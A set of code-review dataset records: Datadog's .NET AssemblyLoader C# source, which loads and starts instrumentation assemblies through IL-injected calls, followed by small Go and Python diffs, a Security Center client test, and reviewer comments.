using System; using System.Collections.Generic; using System.IO; using System.Reflection; using System.Threading; using Datadog.Util; namespace Datadog.AutoInstrumentation.ManagedLoader { /// <summary> /// Loads specified assemblies into the current AppDomain. /// /// This is the only public class in this assembly. /// This entire assembly is compiled into the native profiler DLL as a resource. /// This happens both, for the profiler part of the Tracer, and for the actual Profiler. /// The native code then uses this class to call arbitrary managed code: /// It uses IL rewriting to inject a call to <c>AssemblyLoader.Run(..)</c> and passes a list of assemblies. /// Then, this class loads all of the specified assemblies and calls a well known entry point in those assemblies. /// (See <c>TargetLibraryEntrypointXxx</c> constants in this class.) /// If the specified assemblies do not contain such an entry point, they will be loaded, but nothing will be executed. /// /// This class sets up a basic AppDomain.AssemblyResolve handler to look for the assemblies in a framework-specific subdirectory /// of the product home directory in addition to the normal probing paths (e.g. DD_DOTNET_TRACER_HOME for the Tracer). /// It also allows for some SxS loading using custom Assembly Load Context. /// /// If a target assembly needs additional AssemblyResolve event logic to satisfy its dependencies, /// or for any other reasons, it must set up its own AssemblyResolve handler as the first thing after its /// entry point is called. /// /// !*! Do not make the AppDomain.AssemblyResolve handler in here more complex !*! /// If anything, it should be simplified and any special logic should be moved into the respective assemblies /// requested for loading. /// /// !*! Also, remember that this assembly is shared between the Tracer's profiler component /// and the Profiler's profiler component. Do not put specialized code here !*! /// </summary> public class AssemblyLoader { /// <summary> /// The constants <c>TargetLibraryEntrypointMethod</c>, and <c>...Type</c> specify /// which entrypoint to call in the specified assemblies. The respective assembly is expected to have /// exactly this entry point. Otherwise, the assembly will be loaded, but nothing will be invoked /// explicitly (but be aware of Module cctor caveats). /// The method must be static, the return type of the method must be <c>void</c> and it must have no parameters. /// Before doing anything else, the target assemblies must set up AppDomain AssemblyResolve events that /// make sure that their respective dependencies can be loaded. /// </summary> public const string TargetLibraryEntrypointMethod = "Run"; /// <summary> The namespace and the type name of the entrypoint to invoke in each loaded assemby. /// More info: <see cref="AssemblyLoader.TargetLibraryEntrypointMethod" />. </summary> public const string TargetLibraryEntrypointType = "Datadog.AutoInstrumentation" + "." + "DllMain"; internal const bool UseConsoleLoggingInsteadOfFile = false; // Should be False in production. internal const bool UseConsoleLogInAdditionToFileLog = false; // Should be False in production? internal const bool UseConsoleLoggingIfFileLoggingFails = true; // May be True in production. Can that affect customer app behaviour? private const string LoggingComponentMoniker = nameof(AssemblyLoader); // The prefix to this is specified in LogComposer.tt private static class ExecuteDelayedConstants { public const string ThreadName = "DD.Profiler." + nameof(AssemblyLoader) + "." + nameof(AssemblyLoader.ExecuteDelayed); public const int SleepDurationMs = 100; // Set this env var to FALSE to disable delayed execution: public const string IsEnabled_EnvVarName = "DD_INTERNAL_LOADER_DELAY_ENABLED"; public const bool IsEnabled_DefaultVal = true; // Set this env var to a POSITIVE NUMBER to force delayed execution in default IIS app domain: public const string IisDelayMs_EnvVarName = "DD_INTERNAL_LOADER_DELAY_IIS_MILLISEC"; public const int IisDelayMs_DefaultVal = 0; } private bool _isDefaultAppDomain; private string[] _assemblyNamesToLoadIntoDefaultAppDomain; private string[] _assemblyNamesToLoadIntoNonDefaultAppDomains; /// <summary> /// Instantiates an <c>AssemblyLoader</c> instance with the specified assemblies and executes it. /// </summary> /// <param name="assemblyNamesToLoadIntoDefaultAppDomain">List of assemblies to load and start if the curret App Domain is the default App Domain.</param> /// <param name="assemblyNamesToLoadIntoNonDefaultAppDomains">List of assemblies to load and start if the curret App Domain is the NOT default App Domain.</param> public static void Run(string[] assemblyNamesToLoadIntoDefaultAppDomain, string[] assemblyNamesToLoadIntoNonDefaultAppDomains) { try { var assemblyLoader = new AssemblyLoader(assemblyNamesToLoadIntoDefaultAppDomain, assemblyNamesToLoadIntoNonDefaultAppDomains); assemblyLoader.Execute(); } catch { // An exception escaped from the loader. We are about to return to the caller, which is likely the IL-injected code in the hook. // All we can do is log the error and swallow it to avoid crashing things. } } /// <summary> /// Initializes a new instance of the <see cref="AssemblyLoader"/> class. /// </summary> /// <param name="assemblyNamesToLoadIntoDefaultAppDomain">List of assemblies to load and start if the curret App Domain is the default App Domain.</param> /// <param name="assemblyNamesToLoadIntoNonDefaultAppDomains">List of assemblies to load and start if the curret App Domain is the NOT default App Domain.</param> public AssemblyLoader(string[] assemblyNamesToLoadIntoDefaultAppDomain, string[] assemblyNamesToLoadIntoNonDefaultAppDomains) { _assemblyNamesToLoadIntoDefaultAppDomain = assemblyNamesToLoadIntoDefaultAppDomain; _assemblyNamesToLoadIntoNonDefaultAppDomains = assemblyNamesToLoadIntoNonDefaultAppDomains; } public void Execute() { try { if (IsExecutionDelayRequired()) { Thread executeDelayedThread = new Thread(ExecuteDelayed); executeDelayedThread.Name = ExecuteDelayedConstants.ThreadName; executeDelayedThread.IsBackground = true; executeDelayedThread.Start(this); } else { InitLogAndExecute(this, isDelayed: false, waitForAppDomainReadinessElapsedMs: 0); } } catch (Exception ex) { LogToConsoleIfEnabled("An error occurred. Assemblies may be not loaded or started.", ex); } } /// <summary> /// <c>ExecuteDelayed</c> is about preventing side effects from running the loader very early in the AppDomain life cycle /// by delaying it towards a later point in the AppDomain Life cycle.<br /> /// <br /> /// Example for a crash caused by this kind of side effect: /// <br /> /// WCF applications using `BasicHttpsBinding` (note the "s" in https) were crashing with the continuous profiler attached. /// Error:<br /> /// _System.Configuration.ConfigurationErrorsException: Configuration binding extension 'system.serviceModel/bindings/basicHttpsBinding' /// could not be found.Verify that this binding extension is properly registered in system.serviceModel/extensions/bindingExtensions and /// that it is spelled correctly._ /// <br /> /// This was because the respective parts WCF configuration subsystem used `WebSocket.IsApplicationTargeting45()` to tweak their behavior /// on different framework versions. In turn, `WebSocket.IsApplicationTargeting45()` calls the static method /// `BinaryCompatibility.TargetsAtLeast_Desktop_V4_5()`. That method uses the static variable `s_map`. That, in turn, is initialized /// by the static cctor, i.e. first time `BinaryCompatibility` the class is used. /// <br /> /// This Assembly Loader calls `Array.Sort` while initializing its logger. /// That, it turn, also uses the `BinaryCompatibility` class internally, to choose a backward-compatible sorting algorithm. /// As a result those flags are initialized and cached when the loader is invoked. However, at that time, the AppDomain may not /// be completely initialized. To initialize, the `BinaryCompatibility` cctor invokes `AppDomain.GetTargetFrameworkName()`, which, /// in turn, calls `Assembly.GetEntryAssembly()`. /// <br /> /// That API returns `null` when invoked too early in the AppDomain lifecycle. /// As a result, a bogus target framework moniker is obtained (and cashed), and - in turn - the binary compatibility flags /// are initialized incorrectly (and also cached). As a result, everything that relies on the binary compatibility flags /// (or the target Framework moniker) may work in an unpredictable matter. This also leads to the WCF crash. /// <br /> /// To mitigate that, inside of <c>Execute()</c> we inspect whether `Assembly.GetEntryAssembly()` returns `null` before we /// start executing. If it does, we off-load the execution to a helper thread and returns immediately. /// The helper thread runs the <c>ExecuteDelayed(..)</c> method: It sleeps and periodically checks /// `Assembly.GetEntryAssembly()` until it no longer returns returns `null`. Then the Loader proceeds with its normal logic. /// <br /> /// As a result, the target framework moniker and the binary compatibility flags are initialized correctly. /// </summary> /// <remarks> /// The above logic is further specialised, depending on the kind of the currnent AppDomain and where the app is hosted: /// <br /> /// * On non-default AD: /// we do not wait. /// <br /> /// * On default AD, app NOT hosted in IIS:: /// `GetEntryAssembly` initially returns null, but once the AD is fully initialized, it returns the correct value. /// So, we apply the above strategy: wait on a separate thread until `GetEntryAssembly` is not null and then execute the loader. /// As mentioned, it is required because some APIs need `GetEntryAssembly` to populate bin compat flags in the Fx. /// * The user does not need to specify a parameter for this, since we wait _until `GetEntryAssembly` is not null_. /// * This behavior is on by default, but all delaying may be disabled using `DD_INTERNAL_LOADER_DELAY_ENABLED=false`. /// <br /> /// * On default AD, app IS hosted in IIS: /// `GetEntryAssembly` always returns null. It will always stay null, and there is no point delaying anything in that case. /// Even if we did delay, we would not have an end-condition for the wait as `GetEntryAssembly` always remains null forever. /// * So by default we do not wait on IIS. /// * As a precaution we support an _optional_ wait that use user can opt into by setting DD_INTERNAL_LOADER_DELAY_IIS_MILLISEC to /// a potitive number of milliseconds. (Since on IIS there is no exit condition to that delay, the option cannot be Boolean.) /// </remarks> private static void ExecuteDelayed(object assemblyLoaderObj) { try { AssemblyLoader assemblyLoader = (AssemblyLoader) assemblyLoaderObj; int startDelayMs = Environment.TickCount; if (IsAppHostedInIis()) { int sleepDurationMs = Math.Max(0, GetIisExecutionDelayMs()); Thread.Sleep(sleepDurationMs); } else { while (!IsAppDomainReadyForExecution()) { try { Thread.Sleep(ExecuteDelayedConstants.SleepDurationMs); } catch (Exception ex) { // Something unexpected and very bad happened, and we know that the logger in not yet initialized. // We must bail. LogToConsoleIfEnabled("Unexpected error while waiting for AppDomain to become ready for execution." + " Will not proceed loading assemblies to avoid unwanted side-effects.", ex); return; } } } int totalElapsedDelayMs = Environment.TickCount - startDelayMs; InitLogAndExecute(assemblyLoader, isDelayed: true, totalElapsedDelayMs); } catch { // Inside of 'InitLogAndExecute(..)' we do everything we can to prevent exceptions from escaping. // Our last choice is to let it escape and potentially crash the process or swallow it. We prefer the latter. } } private static bool IsExecutionDelayRequired() { // We delay IFF: return IsExecuteDelayedEnabled() // The user did NOT disable the delay feature; && AppDomain.CurrentDomain.IsDefaultAppDomain() // AND we are in the default AppDomain; && (!IsAppHostedInIis() || GetIisExecutionDelayMs() >= 1) // AND we are either NOT in IIS, OR we are in IIS and the user enabled IIS-delay; && !IsAppDomainReadyForExecution(); // AND the over-time-changing delay-stop contitions are not already met. } private static bool IsAppDomainReadyForExecution() { // If the entry assembly IS known, then we are ready. return (Assembly.GetEntryAssembly() != null); } private static void InitLogAndExecute(AssemblyLoader assemblyLoader, bool isDelayed, int waitForAppDomainReadinessElapsedMs) { try { LogConfigurator.SetupLogger(); } catch (Exception ex) { LogToConsoleIfEnabled("An error occurred while initializeing the logging subsystem. This is not an expected state." + " Will not proceed loading assemblies to avoid unwanted side-effects.", ex); return; } try { assemblyLoader.Execute(isDelayed, waitForAppDomainReadinessElapsedMs); } catch (Exception ex) { // An exception escaped from the loader. // We are about to return to the caller, which is either the IL-injected in the hook or the bottom of the delay-thread. // So all we can do is log the error and swallow it to avoid crashing things. Log.Error(LoggingComponentMoniker, ex); } } /// <summary> /// Loads the assemblies specified for this <c>AssemblyLoader</c> instance and executes their entry point. /// </summary> private void Execute(bool isDelayed, int waitForAppDomainReadinessElapsedMs) { #if DEBUG const string BuildConfiguration = "Debug"; #else const string BuildConfiguration = "Release"; #endif Log.Info(LoggingComponentMoniker, "Initializing...", "Managed Loader build configuration", BuildConfiguration, nameof(isDelayed), isDelayed, nameof(waitForAppDomainReadinessElapsedMs), waitForAppDomainReadinessElapsedMs, $"{nameof(IsExecuteDelayedEnabled)}()", IsExecuteDelayedEnabled(), $"{nameof(IsAppHostedInIis)}()", IsAppHostedInIis(), $"{nameof(GetIisExecutionDelayMs)}()", GetIisExecutionDelayMs()); AnalyzeAppDomain(); AssemblyResolveEventHandler assemblyResolveEventHandler = CreateAssemblyResolveEventHandler(); if (assemblyResolveEventHandler == null) { return; } Log.Info(LoggingComponentMoniker, "Registering AssemblyResolve handler"); try { AppDomain.CurrentDomain.AssemblyResolve += assemblyResolveEventHandler.OnAssemblyResolve; } catch (Exception ex) { Log.Error(LoggingComponentMoniker, "Error while registering an AssemblyResolve event handler", ex); } LogStartingToLoadAssembliesInfo(assemblyResolveEventHandler); for (int i = 0; i < assemblyResolveEventHandler.AssemblyNamesToLoad.Count; i++) { string assemblyName = assemblyResolveEventHandler.AssemblyNamesToLoad[i]; try { LoadAndStartAssembly(assemblyName); } catch (Exception ex) { Log.Error(LoggingComponentMoniker, "Error loading or starting a managed assembly", ex, "assemblyName", assemblyName); } } } private static void LogStartingToLoadAssembliesInfo(AssemblyResolveEventHandler assemblyResolveEventHandler) { var logEntryDetails = new List<object>(); logEntryDetails.Add("Number of assemblies"); logEntryDetails.Add(assemblyResolveEventHandler.AssemblyNamesToLoad.Count); logEntryDetails.Add("Number of product binaries directories"); logEntryDetails.Add(assemblyResolveEventHandler.ManagedProductBinariesDirectories.Count); for (int i = 0; i < assemblyResolveEventHandler.ManagedProductBinariesDirectories.Count; i++) { logEntryDetails.Add($"managedProductBinariesDirectories[{i}]"); logEntryDetails.Add(assemblyResolveEventHandler.ManagedProductBinariesDirectories[i]); } Log.Info(LoggingComponentMoniker, "Starting to load assemblies", logEntryDetails); } private static void LoadAndStartAssembly(string assemblyName) { // We have previously excluded assembly names that are null or white-space. assemblyName = assemblyName.Trim(); Log.Info(LoggingComponentMoniker, "Loading managed assembly", "assemblyName", assemblyName); Assembly assembly = Assembly.Load(assemblyName); if (assembly == null) { Log.Error(LoggingComponentMoniker, "Could not load managed assembly", "assemblyName", assemblyName); return; } Exception findEntryPointError = null; Type entryPointType = null; try { entryPointType = assembly.GetType(TargetLibraryEntrypointType, throwOnError: false); } catch (Exception ex) { findEntryPointError = ex; } if (entryPointType == null) { Log.Info( LoggingComponentMoniker, "Assembly was loaded, but entry point was not invoked, bacause it does not contain the entry point type", "assembly.FullName", assembly.FullName, "assembly.Location", assembly.Location, "assembly.CodeBase", assembly.CodeBase, "entryPointType", TargetLibraryEntrypointType, "findEntryPointError", (findEntryPointError == null) ? "None" : $"{findEntryPointError.GetType().Name}: {findEntryPointError.Message}"); return; } MethodInfo entryPointMethod = null; try { entryPointMethod = entryPointType.GetMethod(TargetLibraryEntrypointMethod, BindingFlags.Public | BindingFlags.Static, binder: null, types: new Type[0], modifiers: null); } catch (Exception ex) { findEntryPointError = ex; } if (entryPointMethod == null) { Log.Info( LoggingComponentMoniker, "Assembly was loaded, but entry point was not invoked: the entry point type was found, but it does not contain the entry point method (it must be public static)", "assembly.FullName", assembly.FullName, "assembly.Location", assembly.Location, "assembly.CodeBase", assembly.CodeBase, "entryPointType", entryPointType.FullName, "entryPointMethod", TargetLibraryEntrypointMethod, "findEntryPointError", (findEntryPointError == null) ? "None" : $"{findEntryPointError.GetType().Name}: {findEntryPointError.Message}"); return; } try { entryPointMethod.Invoke(obj: null, parameters: null); } catch (Exception ex) { Log.Error( LoggingComponentMoniker, "Assembly was loaded and the entry point was invoked; an exception was thrown from the entry point", ex, "assembly.FullName", assembly.FullName, "assembly.Location", assembly.Location, "assembly.CodeBase", assembly.CodeBase, "entryPointType", entryPointType.FullName, "entryPointMethod", entryPointMethod.Name); return; } Log.Info( LoggingComponentMoniker, "Assembly was loaded and the entry point was invoked", "assembly.FullName", assembly.FullName, "assembly.Location", assembly.Location, "assembly.CodeBase", assembly.CodeBase, "entryPointType", entryPointType.FullName, "entryPointMethod", entryPointMethod.Name); return; } private static IReadOnlyList<string> CleanAssemblyNamesToLoad(string[] assemblyNamesToLoad) { if (assemblyNamesToLoad == null) { Log.Info(LoggingComponentMoniker, $"Not loading any assemblies ({nameof(assemblyNamesToLoad)} is null). "); return null; } if (assemblyNamesToLoad.Length == 0) { Log.Info(LoggingComponentMoniker, $"Not loading any assemblies ({nameof(assemblyNamesToLoad)}.{nameof(assemblyNamesToLoad.Length)} is 0). "); return null; } // Check for bad assemblyNamesToLoad entries. We expect the array to be small and entries to be OK. // So scrolling multiple times is better then allocating a temp buffer. bool someAssemblyNameNeedsCleaning = false; int validAssemblyNamesCount = 0; for (int pAsmNames = 0; pAsmNames < assemblyNamesToLoad.Length; pAsmNames++) { if (CleanAssemblyNameToLoad(assemblyNamesToLoad[pAsmNames], out _, out bool asmNameNeedsCleaning)) { validAssemblyNamesCount++; someAssemblyNameNeedsCleaning = someAssemblyNameNeedsCleaning || asmNameNeedsCleaning; } } if (validAssemblyNamesCount == 0) { Log.Info(LoggingComponentMoniker, $"Not loading any assemblies. Some assembly names were specified, but they are all null or white-space."); return null; } if (assemblyNamesToLoad.Length == validAssemblyNamesCount && !someAssemblyNameNeedsCleaning) { return assemblyNamesToLoad; } string[] validAssemblyNamesToLoad = new string[validAssemblyNamesCount]; for (int pAsmNames = 0, pValidAsmNames = 0; pAsmNames < assemblyNamesToLoad.Length; pAsmNames++) { if (CleanAssemblyNameToLoad(assemblyNamesToLoad[pAsmNames], out string cleanAssemblyNameToLoad, out _)) { validAssemblyNamesToLoad[pValidAsmNames++] = cleanAssemblyNameToLoad; } } return validAssemblyNamesToLoad; } private static bool CleanAssemblyNameToLoad(string rawAssemblyName, out string cleanAssemblyName, out bool asmNameNeedsCleaning) { if (String.IsNullOrWhiteSpace(rawAssemblyName)) { cleanAssemblyName = null; asmNameNeedsCleaning = true; return false; } const string DllExtension = ".dll"; cleanAssemblyName = rawAssemblyName.Trim(); if (cleanAssemblyName.EndsWith(DllExtension, StringComparison.OrdinalIgnoreCase)) { cleanAssemblyName = cleanAssemblyName.Substring(0, cleanAssemblyName.Length - DllExtension.Length); } else { if (cleanAssemblyName.Equals(rawAssemblyName, StringComparison.Ordinal)) { asmNameNeedsCleaning = false; return true; } } if (String.IsNullOrWhiteSpace(cleanAssemblyName)) { cleanAssemblyName = null; asmNameNeedsCleaning = true; return false; } asmNameNeedsCleaning = true; return true; } private static IReadOnlyList<string> ResolveManagedProductBinariesDirectories() { var binaryDirs = new List<string>(capacity: 5); GetTracerManagedBinariesDirectories(binaryDirs); GetProfilerManagedBinariesDirectories(binaryDirs); return binaryDirs; } private static void GetTracerManagedBinariesDirectories(List<string> binaryDirs) { // E.g.: // - c:\Program Files\Datadog\.NET Tracer\tracer\net45\ // - c:\Program Files\Datadog\.NET Tracer\tracer\netcoreapp3.1\ // - ... string tracerHomeDirectory = ReadEnvironmentVariable("DD_DOTNET_TRACER_HOME"); if (String.IsNullOrWhiteSpace(tracerHomeDirectory)) { return; } string managedBinariesSubdir = GetRuntimeBasedProductBinariesSubdir(); string managedBinariesDirectory = Path.Combine(tracerHomeDirectory, managedBinariesSubdir); if (binaryDirs != null && !String.IsNullOrWhiteSpace(managedBinariesDirectory)) { binaryDirs.Add(managedBinariesDirectory); } } private static void GetProfilerManagedBinariesDirectories(List<string> binaryDirs) { // E.g.: // - c:\Program Files\Datadog\.NET Tracer\ContinuousProfiler\net45\ // - c:\Program Files\Datadog\.NET Tracer\ContinuousProfiler\netcoreapp3.1\ // - ... string profilerHomeDirectory = ReadEnvironmentVariable("DD_DOTNET_PROFILER_HOME"); // Be defensive against env var not being set. if (String.IsNullOrWhiteSpace(profilerHomeDirectory)) { return; } string managedBinariesSubdir = GetRuntimeBasedProductBinariesSubdir(); string managedBinariesDirectory = Path.Combine(profilerHomeDirectory, managedBinariesSubdir); if (binaryDirs != null && !String.IsNullOrWhiteSpace(managedBinariesDirectory)) { binaryDirs.Add(managedBinariesDirectory); } } private static string GetRuntimeBasedProductBinariesSubdir() { return GetRuntimeBasedProductBinariesSubdir(out bool _); } private static string GetRuntimeBasedProductBinariesSubdir(out bool isCoreFx) { Assembly objectAssembly = typeof(object).Assembly; isCoreFx = (objectAssembly?.FullName?.StartsWith("System.Private.CoreLib") == true); string productBinariesSubdir; if (isCoreFx) { // We are running under .NET Core (or .NET 5+). // Old versions of .NET core report a major version of 4. // The respective binaries are in <HOME>/netstandard2.0/... // Newer binaries are in <HOME>/netcoreapp3.1/... // This needs to be extended if and when we ship a specific distro for newer .NET versions! Version clrVersion = Environment.Version; if ((clrVersion.Major == 3 && clrVersion.Minor >= 1) || clrVersion.Major >= 5) { productBinariesSubdir = "netcoreapp3.1"; } else { productBinariesSubdir = "netstandard2.0"; } } else { // We are running under the (classic) .NET Framework. // We currently ship two distributions targeting .NET Framework. // We want to use the highest-possible compatible assembly version number. // We will try getting the version of mscorlib used. // If that version is >= 4.61 then we use the respective distro. Otherwise we use the Net F 4.5 distro. try { string objectAssemblyFileVersionString = ((AssemblyFileVersionAttribute) objectAssembly.GetCustomAttribute(typeof(AssemblyFileVersionAttribute))).Version; var objectAssemblyVersion = new Version(objectAssemblyFileVersionString); var mscorlib461Version = new Version("4.6.1055.0"); productBinariesSubdir = (objectAssemblyVersion < mscorlib461Version) ? "net45" : "net461"; } catch { productBinariesSubdir = "net45"; } } return productBinariesSubdir; } private static string ReadEnvironmentVariable(string envVarName) { try { return Environment.GetEnvironmentVariable(envVarName); } catch (Exception ex) { Log.Error(LoggingComponentMoniker, "Error while reading environment variable", ex, "envVarName", envVarName); return null; } } private static void LogToConsoleIfEnabled(string message, Exception ex = null) { if (UseConsoleLoggingIfFileLoggingFails) { #pragma warning disable IDE0079 // Remove unnecessary suppression: Supresion is necessary for some, but not all compile time settings #pragma warning disable CS0162 // Unreachable code detected (deliberately using const bool for compile settings) Console.WriteLine($"{Environment.NewLine}{LoggingComponentMoniker}: {message}" + (ex == null ? String.Empty : $"{Environment.NewLine}{ex}")); #pragma warning restore CS0162 // Unreachable code detected #pragma warning restore IDE0079 // Remove unnecessary suppression } } private void AnalyzeAppDomain() { AppDomain currAD = AppDomain.CurrentDomain; _isDefaultAppDomain = currAD.IsDefaultAppDomain(); Log.Info(LoggingComponentMoniker, "Will load and start assemblies listed for " + (_isDefaultAppDomain ? "the Default AppDomain" : "Non-default AppDomains") + "."); Log.Info(LoggingComponentMoniker, "Listing current AppDomain info", "IsDefaultAppDomain", _isDefaultAppDomain, "Id", currAD.Id, "FriendlyName", currAD.FriendlyName, #if NETFRAMEWORK "SetupInformation.TargetFrameworkName", currAD.SetupInformation.TargetFrameworkName, #else "SetupInformation.TargetFrameworkName", "Not available on this .NET version", #endif "IsFullyTrusted", currAD.IsFullyTrusted, "IsHomogenous", currAD.IsHomogenous, "BaseDirectory", currAD.BaseDirectory, "DynamicDirectory", currAD.DynamicDirectory, "RelativeSearchPath", currAD.RelativeSearchPath, "ShadowCopyFiles", currAD.ShadowCopyFiles); Assembly entryAssembly = Assembly.GetEntryAssembly(); Log.Info(LoggingComponentMoniker, "Listing Entry Assembly info", "FullName", entryAssembly?.FullName, "Location", entryAssembly?.Location); TryGetCurrentThread(out int osThreadId, out Thread currentThread); Log.Info(LoggingComponentMoniker, "Listing current Thread info", nameof(osThreadId), osThreadId, "IsBackground", currentThread?.IsBackground, "IsThreadPoolThread", currentThread?.IsThreadPoolThread, "ManagedThreadId", currentThread?.ManagedThreadId, "Name", currentThread?.Name); if (Log.IsDebugLoggingEnabled) { string stackTrace = Environment.StackTrace; Log.Debug(LoggingComponentMoniker, "Listing invocation Stack Trace", nameof(stackTrace), stackTrace); } } private static bool IsExecuteDelayedEnabled() { string isDelayEnabledEnvVarString = GetEnvironmentVariable(ExecuteDelayedConstants.IsEnabled_EnvVarName); Parse.TryBoolean(isDelayEnabledEnvVarString, ExecuteDelayedConstants.IsEnabled_DefaultVal, out bool isDelayEnabledValue); return isDelayEnabledValue; } private static int GetIisExecutionDelayMs() { string iisDelayMsEnvVarString = GetEnvironmentVariable(ExecuteDelayedConstants.IisDelayMs_EnvVarName); Parse.TryInt32(iisDelayMsEnvVarString, ExecuteDelayedConstants.IisDelayMs_DefaultVal, out int iisExecutionDelayMs); return iisExecutionDelayMs; } private static bool IsAppHostedInIis() { // Corresponds to the equivalent check in native: // https://github.com/DataDog/dd-trace-dotnet/blob/master/tracer/src/Datadog.Trace.ClrProfiler.Native/cor_profiler.cpp#L286-L289 string processFileName = CurrentProcess.GetMainFileName(); bool isAppHostedInIis = processFileName.Equals("w3wp.exe", StringComparison.OrdinalIgnoreCase) || processFileName.Equals("iisexpress.exe", StringComparison.OrdinalIgnoreCase); return isAppHostedInIis; } private static string GetEnvironmentVariable(string endVarName) { try { return Environment.GetEnvironmentVariable(endVarName); } catch { return null; } } private static bool TryGetCurrentThread(out int osThreadId, out Thread currentThread) { try { #pragma warning disable CS0618 // GetCurrentThreadId is obsolete but we can still use it for logging purposes (see respective docs) osThreadId = AppDomain.GetCurrentThreadId(); #pragma warning restore CS0618 // Type or member is obsolete currentThread = Thread.CurrentThread; return true; } catch { osThreadId = 0; currentThread = null; return false; } } private AssemblyResolveEventHandler CreateAssemblyResolveEventHandler() { // Pick the list that we want to load: string[] assemblyListToUse = _isDefaultAppDomain ? _assemblyNamesToLoadIntoDefaultAppDomain : _assemblyNamesToLoadIntoNonDefaultAppDomains; // Set class fields to null so that the arrays can be collected. The "assemblyResolveEventHandler" will encpsulate the data needed. _assemblyNamesToLoadIntoDefaultAppDomain = _assemblyNamesToLoadIntoNonDefaultAppDomains = null; IReadOnlyList<string> assemblyNamesToLoad = CleanAssemblyNamesToLoad(assemblyListToUse); if (assemblyNamesToLoad == null) { return null; } IReadOnlyList<string> managedProductBinariesDirectories = ResolveManagedProductBinariesDirectories(); var assemblyResolveEventHandler = new AssemblyResolveEventHandler(assemblyNamesToLoad, managedProductBinariesDirectories); return assemblyResolveEventHandler; } } }
1
23,156
> specialised This isn't a typo in my neck of the woods
DataDog-dd-trace-dotnet
.cs
@@ -29,6 +29,7 @@ import ( var packages = []string{ "github.com/google/knative-gcp/test/cmd/target", + "github.com/google/knative-gcp/test/cmd/storageTarget", } var packageToImageConfig = map[string]string{}
1
// +build e2e /* Copyright 2019 Google LLC Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package e2e import ( "fmt" "os" "strings" "testing" "knative.dev/pkg/test/logstream" ) var packages = []string{ "github.com/google/knative-gcp/test/cmd/target", } var packageToImageConfig = map[string]string{} var packageToImageConfigDone bool func TestMain(m *testing.M) { for _, pack := range packages { image, err := KoPublish(pack) if err != nil { fmt.Printf("error attempting to ko publish: %s\n", err) panic(err) } i := strings.Split(pack, "/") packageToImageConfig[i[len(i)-1]+"Image"] = image } packageToImageConfigDone = true os.Exit(m.Run()) } // This test is more for debugging the ko publish process. func TestKoPublish(t *testing.T) { for k, v := range packageToImageConfig { t.Log(k, "-->", v) } } // Rest of e2e tests go below: // TestSmoke makes sure we can run tests. func TestSmokeChannel(t *testing.T) { cancel := logstream.Start(t) defer cancel() SmokeTestChannelImpl(t) } // TestSmokePullSubscription makes sure we can run tests on PullSubscriptions. func TestSmokePullSubscription(t *testing.T) { cancel := logstream.Start(t) defer cancel() SmokePullSubscriptionTestImpl(t) } // TestPullSubscriptionWithTarget tests we can knock down a target. func TestPullSubscriptionWithTarget(t *testing.T) { cancel := logstream.Start(t) defer cancel() PullSubscriptionWithTargetTestImpl(t, packageToImageConfig) }
1
9,354
will change to `storage_target`
google-knative-gcp
go
@@ -38,7 +38,7 @@ class SecurityCenterTest(unittest_utils.ForsetiTestCase): """Set up.""" fake_global_configs = { 'securitycenter': {'max_calls': 1, 'period': 1.1}} - cls.securitycenter_beta_api_client = securitycenter.SecurityCenterClient(version='v1beta1') + cls.securitycenter = securitycenter.SecurityCenterClient(version='v1') cls.project_id = 111111 cls.source_id = 'organizations/111/sources/222'
1
# Copyright 2017 The Forseti Security Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests the Security Center API client.""" import json import unittest import mock import google.auth from google.oauth2 import credentials from google.cloud.forseti.common.gcp_api import securitycenter from google.cloud.forseti.common.gcp_api import errors as api_errors from tests import unittest_utils from tests.common.gcp_api.test_data import fake_securitycenter_responses as fake_cscc from tests.common.gcp_api.test_data import http_mocks class SecurityCenterTest(unittest_utils.ForsetiTestCase): """Test the Security Center Client.""" @classmethod @mock.patch.object( google.auth, 'default', return_value=(mock.Mock(spec_set=credentials.Credentials), 'test-project')) def setUpClass(cls, mock_google_credential): """Set up.""" fake_global_configs = { 'securitycenter': {'max_calls': 1, 'period': 1.1}} cls.securitycenter_beta_api_client = securitycenter.SecurityCenterClient(version='v1beta1') cls.project_id = 111111 cls.source_id = 'organizations/111/sources/222' def test_create_findings(self): """Test create cscc findings.""" http_mocks.mock_http_response( json.dumps(fake_cscc.EXPECTED_CREATE_FINDING_RESULT)) result = self.securitycenter_beta_api_client.create_finding( 'fake finding', source_id=self.source_id ) self.assertEquals(fake_cscc.EXPECTED_CREATE_FINDING_RESULT, result) def test_create_findings_raises(self): """Test create cscc finding raises exception.""" http_mocks.mock_http_response(fake_cscc.PERMISSION_DENIED, '403') # beta api fake_beta_finding = {'source_properties': {'violation_data': 'foo'}} with self.assertRaises(api_errors.ApiExecutionError): self.securitycenter_beta_api_client.create_finding( fake_beta_finding, source_id=self.source_id) if __name__ == '__main__': unittest.main()
1
33,884
This would be better as `cls.securitycenter_client`, to match what is being instantiated.
forseti-security-forseti-security
py
@@ -34,6 +34,15 @@ import appModules import watchdog import extensionPoints from fileUtils import getFileVersionInfo +import shlobj +from functools import wraps + +# Path to the native system32 directory. +nativeSys32: str = shlobj.SHGetFolderPath(None, shlobj.CSIDL.SYSTEM) +# Path to the syswow64 directory if it exists on the current system. +Syswow64Sys32: str = shlobj.SHGetFolderPath(None, shlobj.CSIDL.SYSTEMX86) +# Do we have separate system32 directories for 32 and 64-bit processes? +hasSeparateSyswow64: bool = nativeSys32 != Syswow64Sys32 #Dictionary of processID:appModule paires used to hold the currently running modules runningTable={}
1
